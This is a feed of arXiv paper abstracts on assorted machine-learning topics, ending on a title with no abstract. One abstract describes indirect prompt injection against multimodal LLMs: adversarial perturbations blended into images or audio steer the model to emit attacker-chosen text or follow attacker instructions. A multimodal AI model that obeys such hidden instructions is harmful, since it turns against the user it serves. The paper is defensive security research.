    Working memory (WM), a fundamental cognitive process facilitating the temporary storage, integration, manipulation, and retrieval of information, plays a vital role in reasoning and decision-making tasks. Robust benchmark datasets that capture the multifaceted nature of WM are crucial for the effective development and evaluation of AI WM models. Here, we introduce a comprehensive Working Memory (WorM) benchmark dataset for this purpose. WorM comprises 10 tasks and a total of 1 million trials, assessing 4 functionalities, 3 domains, and 11 behavioral and neural characteristics of WM. We jointly trained and tested state-of-the-art recurrent neural networks and transformers on all these tasks. We also include human behavioral benchmarks as an upper bound for comparison. Our results suggest that AI models replicate some characteristics of WM in the brain, most notably primacy and recency effects, and neural clusters and correlates specialized for different domains and functionalities of WM. In the experiments, we also reveal some limitations in existing models to approximate human behavior. This dataset serves as a valuable resource for communities in cognitive psychology, neuroscience, and AI, offering a standardized framework to compare and enhance WM models, investigate WM's neural underpinnings, and develop WM models with human-like capabilities. Our source code and data are available at https://github.com/ZhangLab-DeepNeuroCogLab/WorM.
    Adversarial attacks for mixtures of classifiers. (arXiv:2307.10788v1 [cs.LG])
    Mixtures of classifiers (a.k.a. randomized ensembles) have been proposed as a way to improve robustness against adversarial attacks. However, it has been shown that existing attacks are not well suited for this kind of classifiers. In this paper, we discuss the problem of attacking a mixture in a principled way and introduce two desirable properties of attacks based on a geometrical analysis of the problem (effectiveness and maximality). We then show that existing attacks do not meet both of these properties. Finally, we introduce a new attack called lattice climber attack with theoretical guarantees on the binary linear setting, and we demonstrate its performance by conducting experiments on synthetic and real datasets.
    Bayesian Spike Train Inference via Non-Local Priors. (arXiv:2307.10177v1 [q-bio.NC])
    Advances in neuroscience have enabled researchers to measure the activities of large numbers of neurons simultaneously in behaving animals. We have access to the fluorescence of each of the neurons which provides a first-order approximation of the neural activity over time. Determining the exact spike of a neuron from this fluorescence trace constitutes an active area of research within the field of computational neuroscience. We propose a novel Bayesian approach based on a mixture of half-non-local prior densities and point masses for this task. Instead of a computationally expensive MCMC algorithm, we adopt a stochastic search-based approach that is capable of taking advantage of modern computing environments often equipped with multiple processors, to explore all possible arrangements of spikes and lack thereof in an observed spike train. It then reports the highest posterior probability arrangement of spikes and posterior probability for a spike at each location of the spike train. Our proposals lead to substantial improvements over existing proposals based on L1 regularization, and enjoy comparable estimation accuracy to the state-of-the-art L0 proposal, in simulations, and on recent calcium imaging data sets. Notably, contrary to optimization-based frequentist approaches, our methodology yields automatic uncertainty quantification associated with the spike-train inference.
    SentimentGPT: Exploiting GPT for Advanced Sentiment Analysis and its Departure from Current Machine Learning. (arXiv:2307.10234v1 [cs.CL])
    This study presents a thorough examination of various Generative Pretrained Transformer (GPT) methodologies in sentiment analysis, specifically in the context of Task 4 on the SemEval 2017 dataset. Three primary strategies are employed: 1) prompt engineering using the advanced GPT-3.5 Turbo, 2) fine-tuning GPT models, and 3) an inventive approach to embedding classification. The research yields detailed comparative insights among these strategies and individual GPT models, revealing their unique strengths and potential limitations. Additionally, the study compares these GPT-based methodologies with other contemporary, high-performing models previously used with the same dataset. The results illustrate the significant superiority of the GPT approaches in terms of predictive performance, more than 22% in F1-score compared to the state-of-the-art. Further, the paper addresses common challenges in sentiment analysis tasks, such as understanding context and detecting sarcasm. It underscores the enhanced capabilities of the GPT models to effectively navigate these complexities. Collectively, these findings highlight the promising potential of GPT models in sentiment analysis, setting the stage for future research in this field. The code can be found at https://github.com/DSAatUSU/SentimentGPT.
    Code Detection for Hardware Acceleration Using Large Language Models. (arXiv:2307.10348v1 [cs.SE])
    Large language models (LLMs) have been massively applied to many tasks, often surpassing state-of-the-art approaches. While their effectiveness in code generation has been extensively studied (e.g., AlphaCode), their potential for code detection remains unexplored. This work presents the first analysis of code detection using LLMs. Our study examines essential kernels, including matrix multiplication, convolution, and fast-fourier transform, implemented in C/C++. We propose both a preliminary, naive prompt and a novel prompting strategy for code detection. Results reveal that conventional prompting achieves great precision but poor accuracy (68.8%, 22.3%, and 79.2% for GEMM, convolution, and FFT, respectively) due to a high number of false positives. Our novel prompting strategy substantially reduces false positives, resulting in excellent overall accuracy (91.1%, 97.9%, and 99.7%, respectively). These results pose a considerable challenge to existing state-of-the-art code detection methods.
    Tapestry of Time and Actions: Modeling Human Activity Sequences using Temporal Point Process Flows. (arXiv:2307.10305v1 [cs.CV])
    Human beings always engage in a vast range of activities and tasks that demonstrate their ability to adapt to different scenarios. Any human activity can be represented as a temporal sequence of actions performed to achieve a certain goal. Unlike the time series datasets extracted from electronics or machines, these action sequences are highly disparate in their nature -- the time to finish a sequence of actions can vary between different persons. Therefore, understanding the dynamics of these sequences is essential for many downstream tasks such as activity length prediction, goal prediction, next action recommendation, etc. Existing neural network-based approaches that learn a continuous-time activity sequence (or CTAS) are limited to the presence of only visual data or are designed specifically for a particular task, i.e., limited to next action or goal prediction. In this paper, we present ProActive, a neural marked temporal point process (MTPP) framework for modeling the continuous-time distribution of actions in an activity sequence while simultaneously addressing three high-impact problems -- next action prediction, sequence-goal prediction, and end-to-end sequence generation. Specifically, we utilize a self-attention module with temporal normalizing flows to model the influence and the inter-arrival times between actions in a sequence. In addition, we propose a novel addition over the ProActive model that can handle variations in the order of actions, i.e., different methods of achieving a given goal. We demonstrate that this variant can learn the order in which the person or actor prefers to do their actions. Extensive experiments on sequences derived from three activity recognition datasets show the significant accuracy boost of ProActive over the state-of-the-art in terms of action and goal prediction, and the first-ever application of end-to-end action sequence generation.
    Fisher-Rao distance and pullback SPD cone distances between multivariate normal distributions. (arXiv:2307.10644v1 [cs.LG])
    Data sets of multivariate normal distributions abound in many scientific areas like diffusion tensor imaging, structure tensor computer vision, radar signal processing, machine learning, just to name a few. In order to process those normal data sets for downstream tasks like filtering, classification or clustering, one needs to define proper notions of dissimilarities between normals and paths joining them. The Fisher-Rao distance defined as the Riemannian geodesic distance induced by the Fisher information metric is such a principled metric distance which however is not known in closed-form excepts for a few particular cases. In this work, we first report a fast and robust method to approximate arbitrarily finely the Fisher-Rao distance between multivariate normal distributions. Second, we introduce a class of distances based on diffeomorphic embeddings of the normal manifold into a submanifold of the higher-dimensional symmetric positive-definite cone corresponding to the manifold of centered normal distributions. We show that the projective Hilbert distance on the cone yields a metric on the embedded normal submanifold and we pullback that cone distance with its associated straight line Hilbert cone geodesics to obtain a distance and smooth paths between normal distributions. Compared to the Fisher-Rao distance approximation, the pullback Hilbert cone distance is computationally light since it requires to compute only the extreme minimal and maximal eigenvalues of matrices. Finally, we show how to use those distances in clustering tasks.
    PreDiff: Precipitation Nowcasting with Latent Diffusion Models. (arXiv:2307.10422v1 [cs.LG])
    Earth system forecasting has traditionally relied on complex physical models that are computationally expensive and require significant domain expertise. In the past decade, the unprecedented increase in spatiotemporal Earth observation data has enabled data-driven forecasting models using deep learning techniques. These models have shown promise for diverse Earth system forecasting tasks but either struggle with handling uncertainty or neglect domain-specific prior knowledge, resulting in averaging possible futures to blurred forecasts or generating physically implausible predictions. To address these limitations, we propose a two-stage pipeline for probabilistic spatiotemporal forecasting: 1) We develop PreDiff, a conditional latent diffusion model capable of probabilistic forecasts. 2) We incorporate an explicit knowledge control mechanism to align forecasts with domain-specific physical constraints. This is achieved by estimating the deviation from imposed constraints at each denoising step and adjusting the transition distribution accordingly. We conduct empirical studies on two datasets: N-body MNIST, a synthetic dataset with chaotic behavior, and SEVIR, a real-world precipitation nowcasting dataset. Specifically, we impose the law of conservation of energy in N-body MNIST and anticipated precipitation intensity in SEVIR. Experiments demonstrate the effectiveness of PreDiff in handling uncertainty, incorporating domain-specific prior knowledge, and generating forecasts that exhibit high operational utility.
    Hidden Markov Models with Random Restarts vs Boosting for Malware Detection. (arXiv:2307.10256v1 [cs.CR])
    Effective and efficient malware detection is at the forefront of research into building secure digital systems. As with many other fields, malware detection research has seen a dramatic increase in the application of machine learning algorithms. One machine learning technique that has been used widely in the field of pattern matching in general-and malware detection in particular-is hidden Markov models (HMMs). HMM training is based on a hill climb, and hence we can often improve a model by training multiple times with different initial values. In this research, we compare boosted HMMs (using AdaBoost) to HMMs trained with multiple random restarts, in the context of malware detection. These techniques are applied to a variety of challenging malware datasets. We find that random restarts perform surprisingly well in comparison to boosting. Only in the most difficult "cold start" cases (where training data is severely limited) does boosting appear to offer sufficient improvement to justify its higher computational cost in the scoring phase.
    Student Assessment in Cybersecurity Training Automated by Pattern Mining and Clustering. (arXiv:2307.10260v1 [cs.CR])
    Hands-on cybersecurity training allows students and professionals to practice various tools and improve their technical skills. The training occurs in an interactive learning environment that enables completing sophisticated tasks in full-fledged operating systems, networks, and applications. During the training, the learning environment allows collecting data about trainees' interactions with the environment, such as their usage of command-line tools. These data contain patterns indicative of trainees' learning processes, and revealing them allows to assess the trainees and provide feedback to help them learn. However, automated analysis of these data is challenging. The training tasks feature complex problem-solving, and many different solution approaches are possible. Moreover, the trainees generate vast amounts of interaction data. This paper explores a dataset from 18 cybersecurity training sessions using data mining and machine learning techniques. We employed pattern mining and clustering to analyze 8834 commands collected from 113 trainees, revealing their typical behavior, mistakes, solution strategies, and difficult training stages. Pattern mining proved suitable in capturing timing information and tool usage frequency. Clustering underlined that many trainees often face the same issues, which can be addressed by targeted scaffolding. Our results show that data mining methods are suitable for analyzing cybersecurity training data. Educational researchers and practitioners can apply these methods in their contexts to assess trainees, support them, and improve the training design. Artifacts associated with this research are publicly available.
    Improving Multimodal Datasets with Image Captioning. (arXiv:2307.10350v1 [cs.LG])
    Massive web datasets play a key role in the success of large vision-language models like CLIP and Flamingo. However, the raw web data is noisy, and existing filtering methods to reduce noise often come at the expense of data diversity. Our work focuses on caption quality as one major source of noise, and studies how generated captions can increase the utility of web-scraped datapoints with nondescript text. Through exploring different mixing strategies for raw and generated captions, we outperform the best filtering method proposed by the DataComp benchmark by 2% on ImageNet and 4% on average across 38 tasks, given a candidate pool of 128M image-text pairs. Our best approach is also 2x better at Flickr and MS-COCO retrieval. We then analyze what makes synthetic captions an effective source of text supervision. In experimenting with different image captioning models, we also demonstrate that the performance of a model on standard image captioning benchmarks (e.g., NoCaps CIDEr) is not a reliable indicator of the utility of the captions it generates for multimodal training. Finally, our experiments with using generated captions at DataComp's large scale (1.28B image-text pairs) offer insights into the limitations of synthetic text, as well as the importance of image curation with increasing training data quantity.
    Privacy Amplification via Importance Sampling. (arXiv:2307.10187v1 [cs.CR])
    We examine the privacy-enhancing properties of subsampling a data set via importance sampling as a pre-processing step for differentially private mechanisms. This extends the established privacy amplification by subsampling result to importance sampling where each data point is weighted by the reciprocal of its selection probability. The implications for privacy of weighting each point are not obvious. On the one hand, a lower selection probability leads to a stronger privacy amplification. On the other hand, the higher the weight, the stronger the influence of the point on the output of the mechanism in the event that the point does get selected. We provide a general result that quantifies the trade-off between these two effects. We show that heterogeneous sampling probabilities can lead to both stronger privacy and better utility than uniform subsampling while retaining the subsample size. In particular, we formulate and solve the problem of privacy-optimal sampling, that is, finding the importance weights that minimize the expected subset size subject to a given privacy budget. Empirically, we evaluate the privacy, efficiency, and accuracy of importance sampling-based privacy amplification on the example of k-means clustering.
    A data science axiology: the nature, value, and risks of data science. (arXiv:2307.10460v1 [cs.AI])
    Data science is not a science. It is a research paradigm with an unfathomed scope, scale, complexity, and power for knowledge discovery that is not otherwise possible and can be beyond human reasoning. It is changing our world practically and profoundly already widely deployed in tens of thousands of applications in every discipline in an AI Arms Race that, due to its inscrutability, can lead to unfathomed risks. This paper presents an axiology of data science, its purpose, nature, importance, risks, and value for problem solving, by exploring and evaluating its remarkable, definitive features. As data science is in its infancy, this initial, speculative axiology is intended to aid in understanding and defining data science to recognize its potential benefits, risks, and open research challenges. AI based data science is inherently about uncertainty that may be more realistic than our preference for the certainty of science. Data science will have impacts far beyond knowledge discovery and will take us into new ways of understanding the world.
    An IPW-based Unbiased Ranking Metric in Two-sided Markets. (arXiv:2307.10204v1 [cs.IR])
    In modern recommendation systems, unbiased learning-to-rank (LTR) is crucial for prioritizing items from biased implicit user feedback, such as click data. Several techniques, such as Inverse Propensity Weighting (IPW), have been proposed for single-sided markets. However, less attention has been paid to two-sided markets, such as job platforms or dating services, where successful conversions require matching preferences from both users. This paper addresses the complex interaction of biases between users in two-sided markets and proposes a tailored LTR approach. We first present a formulation of feedback mechanisms in two-sided matching platforms and point out that their implicit feedback may include position bias from both user groups. On the basis of this observation, we extend the IPW estimator and propose a new estimator, named two-sided IPW, to address the position bases in two-sided markets. We prove that the proposed estimator satisfies the unbiasedness for the ground-truth ranking metric. We conducted numerical experiments on real-world two-sided platforms and demonstrated the effectiveness of our proposed method in terms of both precision and robustness. Our experiments showed that our method outperformed baselines especially when handling rare items, which are less frequently observed in the training data.
    A New Computationally Simple Approach for Implementing Neural Networks with Output Hard Constraints. (arXiv:2307.10459v1 [cs.LG])
    A new computationally simple method of imposing hard convex constraints on the neural network output values is proposed. The key idea behind the method is to map a vector of hidden parameters of the network to a point that is guaranteed to be inside the feasible set defined by a set of constraints. The mapping is implemented by the additional neural network layer with constraints for output. The proposed method is simply extended to the case when constraints are imposed not only on the output vectors, but also on joint constraints depending on inputs. The projection approach to imposing constraints on outputs can simply be implemented in the framework of the proposed method. It is shown how to incorporate different types of constraints into the proposed method, including linear and quadratic constraints, equality constraints, and dynamic constraints, constraints in the form of boundaries. An important feature of the method is its computational simplicity. Complexities of the forward pass of the proposed neural network layer by linear and quadratic constraints are O(n*m) and O(n^2*m), respectively, where n is the number of variables, m is the number of constraints. Numerical experiments illustrate the method by solving optimization and classification problems. The code implementing the method is publicly available.
    Uncertainty Quantification for Molecular Property Predictions with Graph Neural Architecture Search. (arXiv:2307.10438v1 [cs.LG])
    Graph Neural Networks (GNNs) have emerged as a prominent class of data-driven methods for molecular property prediction. However, a key limitation of typical GNN models is their inability to quantify uncertainties in the predictions. This capability is crucial for ensuring the trustworthy use and deployment of models in downstream tasks. To that end, we introduce AutoGNNUQ, an automated uncertainty quantification (UQ) approach for molecular property prediction. AutoGNNUQ leverages architecture search to generate an ensemble of high-performing GNNs, enabling the estimation of predictive uncertainties. Our approach employs variance decomposition to separate data (aleatoric) and model (epistemic) uncertainties, providing valuable insights for reducing them. In our computational experiments, we demonstrate that AutoGNNUQ outperforms existing UQ methods in terms of both prediction accuracy and UQ performance on multiple benchmark datasets. Additionally, we utilize t-SNE visualization to explore correlations between molecular features and uncertainty, offering insight for dataset improvement. AutoGNNUQ has broad applicability in domains such as drug discovery and materials science, where accurate uncertainty quantification is crucial for decision-making.
    Several categories of Large Language Models (LLMs): A Short Survey. (arXiv:2307.10188v1 [cs.CL])
    Large Language Models(LLMs)have become effective tools for natural language processing and have been used in many different fields. This essay offers a succinct summary of various LLM subcategories. The survey emphasizes recent developments and efforts made for various LLM kinds, including task-based financial LLMs, multilingual language LLMs, biomedical and clinical LLMs, vision language LLMs, and code language models. The survey gives a general summary of the methods, attributes, datasets, transformer models, and comparison metrics applied in each category of LLMs. Furthermore, it highlights unresolved problems in the field of developing chatbots and virtual assistants, such as boosting natural language processing, enhancing chatbot intelligence, and resolving moral and legal dilemmas. The purpose of this study is to provide readers, developers, academics, and users interested in LLM-based chatbots and virtual intelligent assistant technologies with useful information and future directions.
    Selection functions of strong lens finding neural networks. (arXiv:2307.10355v1 [astro-ph.CO])
    Convolution Neural Networks trained for the task of lens finding with similar architecture and training data as is commonly found in the literature are biased classifiers. An understanding of the selection function of lens finding neural networks will be key to fully realising the potential of the large samples of strong gravitational lens systems that will be found in upcoming wide-field surveys. We use three training datasets, representative of those used to train galaxy-galaxy and galaxy-quasar lens finding neural networks. The networks preferentially select systems with larger Einstein radii and larger sources with more concentrated source-light distributions. Increasing the detection significance threshold to 12$\sigma$ from 8$\sigma$ results in 50 per cent of the selected strong lens systems having Einstein radii $\theta_\mathrm{E}$ $\ge$ 1.04 arcsec from $\theta_\mathrm{E}$ $\ge$ 0.879 arcsec, source radii $R_S$ $\ge$ 0.194 arcsec from $R_S$ $\ge$ 0.178 arcsec and source S\'ersic indices $n_{\mathrm{Sc}}^{\mathrm{S}}$ $\ge$ 2.62 from $n_{\mathrm{Sc}}^{\mathrm{S}}$ $\ge$ 2.55. The model trained to find lensed quasars shows a stronger preference for higher lens ellipticities than those trained to find lensed galaxies. The selection function is independent of the slope of the power-law of the mass profiles, hence measurements of this quantity will be unaffected. The lens finder selection function reinforces that of the lensing cross-section, and thus we expect our findings to be a general result for all galaxy-galaxy and galaxy-quasar lens finding neural networks.
    Efficient selective attention LSTM for well log curve synthesis. (arXiv:2307.10253v1 [cs.LG])
    Non-core drilling has gradually become the primary exploration method in geological engineering, and well logging curves have increasingly gained importance as the main carriers of geological information. However, factors such as geological environment, logging equipment, borehole quality, and unexpected events can all impact the quality of well logging curves. Previous methods of re-logging or manual corrections have been associated with high costs and low efficiency. This paper proposes a machine learning method that utilizes existing data to predict missing well logging curves, and its effectiveness and feasibility have been validated through experiments. The proposed method builds upon the traditional Long Short-Term Memory (LSTM) neural network by incorporating a self-attention mechanism to analyze the spatial dependencies of the data. It selectively includes the dominant computational results in the LSTM, reducing the computational complexity from O(n^2) to O(nlogn) and improving model efficiency. Experimental results demonstrate that the proposed method achieves higher accuracy compared to traditional curve synthesis methods based on Fully Connected Neural Networks (FCNN) and LSTM. This accurate, efficient, and cost-effective prediction method holds practical value in engineering applications.
    Hyperparameter Tuning Cookbook: A guide for scikit-learn, PyTorch, river, and spotPython. (arXiv:2307.10262v1 [cs.LG])
    This document provides a comprehensive guide to hyperparameter tuning using spotPython for scikit-learn, PyTorch, and river. The first part introduces spotPython's surrogate model-based optimization process, while the second part focuses on hyperparameter tuning. Several case studies are presented, including hyperparameter tuning for sklearn models such as Support Vector Classification, Random Forests, Gradient Boosting (XGB), and K-nearest neighbors (KNN), as well as a Hoeffding Adaptive Tree Regressor from river. The integration of spotPython into the PyTorch and PyTorch Lightning training workflow is also discussed. With a hands-on approach and step-by-step explanations, this cookbook serves as a practical starting point for anyone interested in hyperparameter tuning with Python. Highlights include the interplay between Tensorboard, PyTorch Lightning, spotPython, and river. This publication is under development, with updates available on the corresponding webpage.
    StyleGAN2-based Out-of-Distribution Detection for Medical Imaging. (arXiv:2307.10193v1 [eess.IV])
    One barrier to the clinical deployment of deep learning-based models is the presence of images at runtime that lie far outside the training distribution of a given model. We aim to detect these out-of-distribution (OOD) images with a generative adversarial network (GAN). Our training dataset was comprised of 3,234 liver-containing computed tomography (CT) scans from 456 patients. Our OOD test data consisted of CT images of the brain, head and neck, lung, cervix, and abnormal livers. A StyleGAN2-ADA architecture was employed to model the training distribution. Images were reconstructed using backpropagation. Reconstructions were evaluated using the Wasserstein distance, mean squared error, and the structural similarity index measure. OOD detection was evaluated with the area under the receiver operating characteristic curve (AUROC). Our paradigm distinguished between liver and non-liver CT with greater than 90% AUROC. It was also completely unable to reconstruct liver artifacts, such as needles and ascites.
    Evaluating and Enhancing Robustness of Deep Recommendation Systems Against Hardware Errors. (arXiv:2307.10244v1 [cs.IR])
    Deep recommendation systems (DRS) heavily depend on specialized HPC hardware and accelerators to optimize energy, efficiency, and recommendation quality. Despite the growing number of hardware errors observed in large-scale fleet systems where DRS are deployed, the robustness of DRS has been largely overlooked. This paper presents the first systematic study of DRS robustness against hardware errors. We develop Terrorch, a user-friendly, efficient and flexible error injection framework on top of the widely-used PyTorch. We evaluate a wide range of models and datasets and observe that the DRS robustness against hardware errors is influenced by various factors from model parameters to input characteristics. We also explore 3 error mitigation methods including algorithm based fault tolerance (ABFT), activation clipping and selective bit protection (SBP). We find that applying activation clipping can recover up to 30% of the degraded AUC-ROC score, making it a promising mitigation method.
    Fast Unsupervised Deep Outlier Model Selection with Hypernetworks. (arXiv:2307.10529v1 [cs.LG])
    Outlier detection (OD) finds many applications with a rich literature of numerous techniques. Deep neural network based OD (DOD) has seen a recent surge of attention thanks to the many advances in deep learning. In this paper, we consider a critical-yet-understudied challenge with unsupervised DOD, that is, effective hyperparameter (HP) tuning/model selection. While several prior work report the sensitivity of OD models to HPs, it becomes ever so critical for the modern DOD models that exhibit a long list of HPs. We introduce HYPER for tuning DOD models, tackling two fundamental challenges: (1) validation without supervision (due to lack of labeled anomalies), and (2) efficient search of the HP/model space (due to exponential growth in the number of HPs). A key idea is to design and train a novel hypernetwork (HN) that maps HPs onto optimal weights of the main DOD model. In turn, HYPER capitalizes on a single HN that can dynamically generate weights for many DOD models (corresponding to varying HPs), which offers significant speed-up. In addition, it employs meta-learning on historical OD tasks with labels to train a proxy validation function, likewise trained with our proposed HN efficiently. Extensive experiments on 35 OD tasks show that HYPER achieves high performance against 8 baselines with significant efficiency gains.
    ECSIC: Epipolar Cross Attention for Stereo Image Compression. (arXiv:2307.10284v1 [eess.IV])
    In this paper, we present ECSIC, a novel learned method for stereo image compression. Our proposed method compresses the left and right images in a joint manner by exploiting the mutual information between the images of the stereo image pair using a novel stereo cross attention (SCA) module and two stereo context modules. The SCA module performs cross-attention restricted to the corresponding epipolar lines of the two images and processes them in parallel. The stereo context modules improve the entropy estimation of the second encoded image by using the first image as a context. We conduct an extensive ablation study demonstrating the effectiveness of the proposed modules and a comprehensive quantitative and qualitative comparison with existing methods. ECSIC achieves state-of-the-art performance among stereo image compression models on the two popular stereo image datasets Cityscapes and InStereo2k while allowing for fast encoding and decoding, making it highly practical for real-time applications.
    On the Sensitivity of Deep Load Disaggregation to Adversarial Attacks. (arXiv:2307.10209v1 [cs.CR])
    Non-intrusive Load Monitoring (NILM) algorithms, commonly referred to as load disaggregation algorithms, are fundamental tools for effective energy management. Despite the success of deep models in load disaggregation, they face various challenges, particularly those pertaining to privacy and security. This paper investigates the sensitivity of prominent deep NILM baselines to adversarial attacks, which have proven to be a significant threat in domains such as computer vision and speech recognition. Adversarial attacks entail the introduction of imperceptible noise into the input data with the aim of misleading the neural network into generating erroneous outputs. We investigate the Fast Gradient Sign Method (FGSM), a well-known adversarial attack, to perturb the input sequences fed into two commonly employed CNN-based NILM baselines: the Sequence-to-Sequence (S2S) and Sequence-to-Point (S2P) models. Our findings provide compelling evidence for the vulnerability of these models, particularly the S2P model which exhibits an average decline of 20\% in the F1-score even with small amounts of noise. Such weakness has the potential to generate profound implications for energy management systems in residential and industrial sectors reliant on NILM models.
    Disentangling Societal Inequality from Model Biases: Gender Inequality in Divorce Court Proceedings. (arXiv:2307.10200v1 [cs.CY])
    Divorce is the legal dissolution of a marriage by a court. Since this is usually an unpleasant outcome of a marital union, each party may have reasons to call the decision to quit which is generally documented in detail in the court proceedings. Via a substantial corpus of 17,306 court proceedings, this paper investigates gender inequality through the lens of divorce court proceedings. While emerging data sources (e.g., public court records) on sensitive societal issues hold promise in aiding social science research, biases present in cutting-edge natural language processing (NLP) methods may interfere with or affect such studies. We thus require a thorough analysis of potential gaps and limitations present in extant NLP resources. In this paper, on the methodological side, we demonstrate that existing NLP resources required several non-trivial modifications to quantify societal inequalities. On the substantive side, we find that while a large number of court cases perhaps suggest changing norms in India where women are increasingly challenging patriarchy, AI-powered analyses of these court proceedings indicate striking gender inequality with women often subjected to domestic violence.
    A Bayesian Programming Approach to Car-following Model Calibration and Validation using Limited Data. (arXiv:2307.10437v1 [cs.LG])
    Traffic simulation software is used by transportation researchers and engineers to design and evaluate changes to roadways. These simulators are driven by models of microscopic driver behavior from which macroscopic measures like flow and congestion can be derived. Many models are designed for a subset of possible traffic scenarios and roadway configurations, while others have no explicit constraints on their application. Work zones (WZs) are one scenario for which no model to date has reproduced realistic driving behavior. This makes it difficult to optimize for safety and other metrics when designing a WZ. The Federal Highway Administration commissioned the USDOT Volpe Center to develop a car-following (CF) model for use in microscopic simulators that can capture and reproduce driver behavior accurately within and outside of WZs. Volpe also performed a naturalistic driving study to collect telematics data from vehicles driven on roads with WZs for use in model calibration. During model development, Volpe researchers observed difficulties in calibrating their model, leaving them to question whether there existed flaws in their model, in the data, or in the procedure used to calibrate the model using the data. In this thesis, I use Bayesian methods for data analysis and parameter estimation to explore and, where possible, address these questions. First, I use Bayesian inference to measure the sufficiency of the size of the data set. Second, I compare the procedure and results of the genetic algorithm based calibration performed by the Volpe researchers with those of Bayesian calibration. Third, I explore the benefits of modeling CF hierarchically. Finally, I apply what was learned in the first three phases using an established CF model, Wiedemann 99, to the probabilistic modeling of the Volpe model. Validation is performed using information criteria as an estimate of predictive accuracy.
    (Ab)using Images and Sounds for Indirect Instruction Injection in Multi-Modal LLMs. (arXiv:2307.10490v1 [cs.CR])
    We demonstrate how images and sounds can be used for indirect prompt and instruction injection in multi-modal LLMs. An attacker generates an adversarial perturbation corresponding to the prompt and blends it into an image or audio recording. When the user asks the (unmodified, benign) model about the perturbed image or audio, the perturbation steers the model to output the attacker-chosen text and/or make the subsequent dialog follow the attacker's instruction. We illustrate this attack with several proof-of-concept examples targeting LLaVa and PandaGPT.
    AUC Optimization from Multiple Unlabeled Datasets. (arXiv:2305.15776v2 [cs.LG] UPDATED)
    Weakly supervised learning aims to empower machine learning when the perfect supervision is unavailable, which has drawn great attention from researchers. Among various types of weak supervision, one of the most challenging cases is to learn from multiple unlabeled (U) datasets with only a little knowledge of the class priors, or U$^m$ learning for short. In this paper, we study the problem of building an AUC (area under ROC curve) optimization model from multiple unlabeled datasets, which maximizes the pairwise ranking ability of the classifier. We propose U$^m$-AUC, an AUC optimization approach that converts the U$^m$ data into a multi-label AUC optimization problem, and can be trained efficiently. We show that the proposed U$^m$-AUC is effective theoretically and empirically.
    FinGPT: Democratizing Internet-scale Data for Financial Large Language Models. (arXiv:2307.10485v1 [cs.CL])
    Large language models (LLMs) have demonstrated remarkable proficiency in understanding and generating human-like texts, which may potentially revolutionize the finance industry. However, existing LLMs often fall short in the financial field, which is mainly attributed to the disparities between general text data and financial text data. Unfortunately, there is only a limited number of financial text datasets available (quite small size), and BloombergGPT, the first financial LLM (FinLLM), is close-sourced (only the training logs were released). In light of this, we aim to democratize Internet-scale financial data for LLMs, which is an open challenge due to diverse data sources, low signal-to-noise ratio, and high time-validity. To address the challenges, we introduce an open-sourced and data-centric framework, \textit{Financial Generative Pre-trained Transformer (FinGPT)}, that automates the collection and curation of real-time financial data from >34 diverse sources on the Internet, providing researchers and practitioners with accessible and transparent resources to develop their FinLLMs. Additionally, we propose a simple yet effective strategy for fine-tuning FinLLM using the inherent feedback from the market, dubbed Reinforcement Learning with Stock Prices (RLSP). We also adopt the Low-rank Adaptation (LoRA, QLoRA) method that enables users to customize their own FinLLMs from open-source general-purpose LLMs at a low cost. Finally, we showcase several FinGPT applications, including robo-advisor, sentiment analysis for algorithmic trading, and low-code development. FinGPT aims to democratize FinLLMs, stimulate innovation, and unlock new opportunities in open finance. The codes are available at https://github.com/AI4Finance-Foundation/FinGPT and https://github.com/AI4Finance-Foundation/FinNLP
    CoNAN: Conditional Neural Aggregation Network For Unconstrained Face Feature Fusion. (arXiv:2307.10237v1 [cs.CV])
    Face recognition from image sets acquired under unregulated and uncontrolled settings, such as at large distances, low resolutions, varying viewpoints, illumination, pose, and atmospheric conditions, is challenging. Face feature aggregation, which involves aggregating a set of N feature representations present in a template into a single global representation, plays a pivotal role in such recognition systems. Existing works in traditional face feature aggregation either utilize metadata or high-dimensional intermediate feature representations to estimate feature quality for aggregation. However, generating high-quality metadata or style information is not feasible for extremely low-resolution faces captured in long-range and high altitude settings. To overcome these limitations, we propose a feature distribution conditioning approach called CoNAN for template aggregation. Specifically, our method aims to learn a context vector conditioned over the distribution information of the incoming feature set, which is utilized to weigh the features based on their estimated informativeness. The proposed method produces state-of-the-art results on long-range unconstrained face recognition datasets such as BTS, and DroneSURF, validating the advantages of such an aggregation strategy.
    SPRINT: A Unified Toolkit for Evaluating and Demystifying Zero-shot Neural Sparse Retrieval. (arXiv:2307.10488v1 [cs.IR])
    Traditionally, sparse retrieval systems relied on lexical representations to retrieve documents, such as BM25, dominated information retrieval tasks. With the onset of pre-trained transformer models such as BERT, neural sparse retrieval has led to a new paradigm within retrieval. Despite the success, there has been limited software supporting different sparse retrievers running in a unified, common environment. This hinders practitioners from fairly comparing different sparse models and obtaining realistic evaluation results. Another missing piece is, that a majority of prior work evaluates sparse retrieval models on in-domain retrieval, i.e. on a single dataset: MS MARCO. However, a key requirement in practical retrieval systems requires models that can generalize well to unseen out-of-domain, i.e. zero-shot retrieval tasks. In this work, we provide SPRINT, a unified Python toolkit based on Pyserini and Lucene, supporting a common interface for evaluating neural sparse retrieval. The toolkit currently includes five built-in models: uniCOIL, DeepImpact, SPARTA, TILDEv2 and SPLADEv2. Users can also easily add customized models by defining their term weighting method. Using our toolkit, we establish strong and reproducible zero-shot sparse retrieval baselines across the well-acknowledged benchmark, BEIR. Our results demonstrate that SPLADEv2 achieves the best average score of 0.470 nDCG@10 on BEIR amongst all neural sparse retrievers. In this work, we further uncover the reasons behind its performance gain. We show that SPLADEv2 produces sparse representations with a majority of tokens outside of the original query and document which is often crucial for its performance gains, i.e. a limitation among its other sparse counterparts. We provide our SPRINT toolkit, models, and data used in our experiments publicly here at https://github.com/thakur-nandan/sprint.
    Adversarial Training Over Long-Tailed Distribution. (arXiv:2307.10205v1 [cs.LG])
    In this paper, we study adversarial training on datasets that obey the long-tailed distribution, which is practical but rarely explored in previous works. Compared with conventional adversarial training on balanced datasets, this process falls into the dilemma of generating uneven adversarial examples (AEs) and an unbalanced feature embedding space, causing the resulting model to exhibit low robustness and accuracy on tail data. To combat that, we propose a new adversarial training framework -- Re-balancing Adversarial Training (REAT). This framework consists of two components: (1) a new training strategy inspired by the term effective number to guide the model to generate more balanced and informative AEs; (2) a carefully constructed penalty function to force a satisfactory feature space. Evaluation results on different datasets and model structures prove that REAT can effectively enhance the model's robustness and preserve the model's clean accuracy. The code can be found in https://github.com/GuanlinLee/REAT.
    Community-Aware Transformer for Autism Prediction in fMRI Connectome. (arXiv:2307.10181v1 [q-bio.NC])
